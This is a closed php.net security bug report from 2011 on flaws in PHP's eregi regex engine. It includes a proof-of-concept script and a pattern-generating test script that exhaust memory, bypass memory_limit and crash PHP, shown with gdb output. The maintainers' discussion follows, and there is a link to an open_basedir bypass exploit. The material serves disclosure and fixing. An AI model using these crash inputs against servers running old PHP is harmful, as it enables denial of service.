php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #60262 multiple flaws memory_limit bypass, dos, code exec
Submitted: 2011-11-11 11:46 UTC Modified: 2018-12-18 01:27 UTC
From: max at cxib dot net Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.4.0RC1 OS:
Private report: No CVE-ID: None
 [2011-11-11 11:46 UTC] max at cxib dot net
Description:
------------
<?
/*poc memory_limit bypass */

ini_set("memory_limit","32M");

if($argv[1]==1)
	$sss=str_repeat("A",$argv[2]);
elseif($argv[1]==2)
	eregi("(.?)(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");

?>

fix 
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/regcomp.c
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/engine.c
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/regex/regex2.h


Test script:
---------------
<?php
/*
tests regcomp. version in php. 
original based code
http://cvsweb.netbsd.org/bsdweb.cgi/src/tests/lib/libc/regex/t_exhaust.c

runing:
cx@cx64:/cxib/source/php-5.4.0RC1/bin/bin$ ulimit -v 1000000
cx@cx64:/cxib/source/php-5.4.0RC1/bin/bin$ ulimit -m 1000000

then run it with result

Program received signal SIGSEGV, Segmentation fault.
memcpy () at ../sysdeps/x86_64/memcpy.S:432
432	../sysdeps/x86_64/memcpy.S: No such file or directory.
	in ../sysdeps/x86_64/memcpy.S

(gdb) x/i $rip
=> 0x7ffff6a7fc69 <memcpy+777>:	mov    %rax,(%rdi)
(gdb) x/x $rax
0x28000002:	Cannot access memory at address 0x28000002
(gdb) x/x $rdi
0x7fffdd79c000:	Cannot access memory at address 0x7fffdd79c000

*/



function patterns($len){
return array(
"(".str_repeat("\(",$len).")", // for p_bre recursion (crash has been fixed)
"(".str_repeat("\(",60).str_repeat("(.*)",$len).")", // for p_bre recursion (problematic for p_bre len>70000)
"(.?)".str_repeat("((.*){0,255}",$len)."".str_repeat(")",$len),
"(.?)".str_repeat("(.\{0,}",$len)."".str_repeat(")",$len),
"(.?)".str_repeat("((.*){1,255}",$len)."".str_repeat(")",$len),
"(.?)".str_repeat("(",$len).".*".str_repeat("){1,100}",$len),
str_repeat("(?:(.*)|",$len)."(.*)".str_repeat(")",$len)
);
}

function execc($patt){
	eregi($patt,"a");
	return 0;
}

if(isset($argv[1]) and isset($argv[2])){
	$patts=patterns($argv[2]);
	echo $patts[$argv[1]];
	execc($patts[$argv[1]]);
}
else
for($flen=1;$flen<1000;$flen+=$flen){
	$currpat=patterns($flen);
	for($fl=0;$fl<count($currpat);$fl++) execc($currpat[$fl]);
}


?>



Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2011-11-21 07:44 UTC] stas@php.net
Note ereg is deprecated since 5.3. Also we probably can't just lift patch from 
NetBSD, will have to port it.
 [2011-11-22 00:54 UTC] max at cxib dot net
that what i know, eregi() will be able in 5.4. safe_mode will be also removed but not in 5.4. in anyway, PHP should be guaranty safety. they are people what uses safe_mode and there are people what bypass it. suphp is also not safe with symlinks. Is there any alternative for safe mode? anyway i may try fix grep() in php54. allowing to bypass memory_limit and code exec in line 54, is not good idea.
 [2011-11-22 01:00 UTC] stas@php.net
Safe mode is actually gone in 5.4 (see UPGRADING in the source), but ereg is 
still available, so I do not deny this needs to be fixed. I just note that the 
use of this function is strongly discouraged in all current PHP versions.
 [2011-11-23 05:19 UTC] max at cxib dot net
you are right . safe_mode is removed. but we have still problem with open_basedir. in 540rc1 is possible to bypass by

http://securityreason.com/expldownload/1/7571/1
 [2012-05-13 15:10 UTC] felipe@php.net
-Private report: No +Private report: Yes
 [2017-08-26 12:22 UTC] cmb@php.net
-Assigned To: +Assigned To: stas
 [2017-08-26 12:22 UTC] cmb@php.net
Since ereg() and friends finally have been removed, I think this
ticket can be (dis)closed. Stas?
 [2018-12-18 01:27 UTC] stas@php.net
-Status: Assigned +Status: Closed
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Fri May 24 21:01:26 2019 UTC